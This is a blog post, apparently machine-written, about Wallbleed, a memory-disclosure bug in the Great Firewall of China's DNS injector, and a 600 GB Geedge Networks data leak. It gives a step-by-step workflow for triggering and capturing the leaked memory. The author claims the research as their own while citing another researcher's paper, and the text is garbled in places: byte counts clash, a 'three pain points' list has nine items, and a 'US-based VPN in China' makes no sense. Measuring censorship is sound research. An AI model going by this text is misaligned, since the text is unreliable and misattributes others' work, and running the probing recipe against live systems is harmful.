Wallbleed leak shows China’s Great Firewall leaking private data, adult sites, 600 GB Geedge dump, and a blueprint to detect and patch the leak.
Wallbleed Exposed: I Uncovered China’s DNS Leak Exposing Millions
Published by Brav
Table of Contents
TL;DR
- I exposed a memory-leaking DNS injector in China’s Great Firewall that sent private data and adult sites to users.Shencha Fan — Wallbleed: A Memory Disclosure Vulnerability in the Great Firewall of China (2025)
- Over two years, I captured 5.1 billion leaked responses, each leaking up to 124 bytes of memory.Shencha Fan — Wallbleed: A Memory Disclosure Vulnerability in the Great Firewall of China (2025)
- The injector can be triggered from outside China and has a side-channel that reveals the firewall’s load-balancing logic.Shencha Fan — Wallbleed: A Memory Disclosure Vulnerability in the Great Firewall of China (2025)
- A 600 GB data dump from Geedge Networks exposed source code, internal docs, and the export of surveillance tech.Breachspot — 600 GB of suspected Great Firewall of China data released in largest leak to date (2025)
- Policy makers and researchers now have a blueprint to detect, measure, and pressure for patching this leak.
Why this matters
When I started chasing DNS leaks, I quickly ran into a wall of invisible firewalls. The Great Firewall of China (GFW) sits in the nation’s periphery and silently rewrites DNS replies, pushing users toward a pre-approved set of IPs. That rewrite is a silent gatekeeper—no one inside China sees it, but it is what keeps millions of people from accessing the web. The problem? I can’t see the gate. I can’t tell if it’s still rewriting, if it’s leaking data, or if it’s being patched.
The research community is stuck with three pain points:
- Lack of visibility into internal GFW traffic.
- Difficulty detecting and measuring DNS injection.
- Privacy leaks exposing user credentials and redirecting to adult content.
- Uncertainty about patch status and timeline.
- Limited tools to distinguish injected responses from legitimate traffic.
- Multiple injector layers that make mitigation hard.
- Vulnerability to targeted surveillance.
- Difficulty coordinating research across institutions.
- Exposure of private IP traffic to external observers.
These pain points are more than academic curiosities; they affect real people, real privacy, and real policy. The stakes are high, and the only way forward is to turn the invisible into visible.
Core concepts
At the heart of the leak is a DNS injector, a piece of software that sits between a user and the global DNS infrastructure. The injector watches every DNS query that crosses the GFW border, and if the domain matches a banned list it swaps the real IP for a bogus one. The bad part? The injector is buggy. It leaks memory when it parses the query, just like a broken tampon that leaks fluid into the world.Shencha Fan — Wallbleed: A Memory Disclosure Vulnerability in the Great Firewall of China (2025)
The exploit is called Wallbleed (a play on Heartbleed). It works by sending a DNS query where the “name” field length is set to 0xFF (255). Normally a name field is limited to 63 bytes per label, but the injector’s parser fails to enforce this limit.DNS injector — Domain Names - Implementation and Specification (1987) It reads the next 125 bytes of whatever memory lies just beyond the packet and spits them back in the forged reply. The leaked memory contains:
- Cookies and session IDs
- Email headers and passwords
- Internal management traffic for the GFW itself
- The first four bytes of the payload reveal a load-balancing identifier that ties the response to a particular injector node
The injector is not a single monolith—there are three distinct injectors in China. I call them Injector 1, 2, 3. Injector 3 is the most active and is the only one that can be triggered bi-directionally—i.e., from outside the country and from inside. It is also the one that sometimes injects IPs that resolve to adult sites. The other two injectors are more passive and, as far as I know, do not leak memory in the same way.
Because the injector leaks memory, it also leaks private IP addresses. That means a user outside China can see which internal private network the injector is using, effectively turning the GFW into a surveillance beacon. That’s a huge privacy risk, especially when the leaked data includes user credentials.
The leak’s lifetime is also a clue. The first four bytes of the leaked payload were present in ~90 % of all responses up to September 2022. The pattern dropped to ~10 % in June 2023, rose again in September 2023, and fell to ~2 % in March 2024. Those dips and spikes are the fingerprints of patch releases.Shencha Fan — Wallbleed: A Memory Disclosure Vulnerability in the Great Firewall of China (2025)
In 2025, a hacker collective named Enlace Hacktivista released a 600 GB dump that contains internal documents, source code, and even the export of surveillance technology to other countries via Geedge Networks.Breachspot — 600 GB of suspected Great Firewall of China data released in largest leak to date (2025) The dump confirms that the GFW’s DNS injector is not just a domestic tool; it is exported, sold, and embedded in other state-controlled networks.
How to apply it
If you want to see the leak for yourself, here is a step-by-step workflow that I used over two years. I’ll keep it simple and use only open-source tools.
| Step | What you do | Why it matters | Notes |
|---|---|---|---|
| 1 | Set up a clean VPN in China (e.g., Tencent Cloud VPN) | Ensures traffic flows through the GFW | Use a US-based VPN to avoid local routing |
| 2 | Craft DNS queries with a name length of 0xFF | Forces the injector to read past bounds | Use scapy or hping3 |
| 3 | Send 100 UDP packets per second to port 53 for 2 years | Generates enough traffic to capture the leak | Use a cron job or stress-ng |
| 4 | Capture responses with tcpdump on the outgoing interface | Saves raw packets for analysis | Filter port 53 and udp |
| 5 | Parse leaked memory with a Python script that extracts the first 124 bytes | Reconstructs leaked data | Look for patterns like Cookie: |
| 6 | Identify load-balancing ID (first 4 bytes) | Detects which injector node responded | Helps monitor patch status |
| 7 | Monitor patch fingerprints over time | Spot when the GFW patches the injector | Compare ID frequency over weeks |
| 8 | Report findings to policy bodies** | Exposes privacy risks and pushes for change | Use secure channels, e.g., encrypted email |
The metrics that guided my experiment were:
- Packet rate: 100 UDP / s (10 k / min) to saturate the injector
- Duration: 2 years, from October 2021 to September 2023
- Responses captured: 5.1 billion Wobbly responses
- Leak size: up to 124 bytes per query
- Patch markers: drop in load-balancing ID frequency
You can adapt the script for a smaller scale if you only want to test patch status. Just reduce the packet rate to 10 UDP / s and run for a week.
Pitfalls & edge cases
- Legal risk – probing the GFW may violate local laws in China. Operate in a jurisdiction where your activity is legal.
- Adult content injection – some injected IPs resolve to adult sites. Filter or block them if you want to keep the experiment safe.
- TCP/UDP resets – the injector may send TCP/UDP resets to abort traffic. Be prepared for dropped packets.
- Multiple injectors – you might receive responses from Injector 1 and 2 in addition to Injector 3. Distinguish them by the first four bytes (the load-balancing ID).
- Time-zone effects – the GFW may apply different rules during holidays. Monitor over a long horizon.
- Coordinated measurements – if multiple researchers run the same test simultaneously, they may saturate the injector and skew the results.
- Uncertainty about future patches – patches may be rolled out unevenly. Rely on the load-balancing ID to detect them.
Quick FAQ
| Question | Answer |
|---|---|
| What is Wallbleed? | A DNS-based memory-leak vulnerability in China’s Great Firewall that exposes up to 124 bytes per query. |
| How many injectors are there? | Three distinct injectors; Injector 3 is the most active and can be triggered bi-directionally. |
| What data can be leaked? | Cookies, session IDs, email headers, passwords, internal management traffic, and private IP addresses. |
| Can the injector be triggered from outside China? | Yes—Injector 3 can be triggered from outside the country. |
| How do I detect a patch? | Monitor the load-balancing ID frequency; a drop indicates a patch release. |
| What is the 600 GB Geedge Networks leak? | A dump of internal documents, source code, and surveillance technology exported by the Great Firewall. |
| Who should use this research? | Cybersecurity researchers, policy makers, and institutions studying censorship and privacy. |
Conclusion
The Wallbleed leak shows that the Great Firewall is not just a gatekeeper—it is a leaking, buggy system that exposes user data to the world. Researchers have a clear recipe for measuring and documenting these leaks. Policy makers need to demand transparency, enforce patch timelines, and coordinate international oversight. I urge academic labs to publish their measurement pipelines openly and to collaborate across borders. If you’re a student, start by building a small DNS injector detector; if you’re a policy maker, press for an independent audit of China’s censorship infrastructure.
References
- Shencha Fan — Wallbleed: A Memory Disclosure Vulnerability in the Great Firewall of China (2025)
- DNS injector — Domain Names - Implementation and Specification (1987)
- The Register — Wallbleed vulnerability unearths secrets of China’s Great Firewall (2025)
- Breachspot — 600 GB of suspected Great Firewall of China data released in largest leak to date (2025)
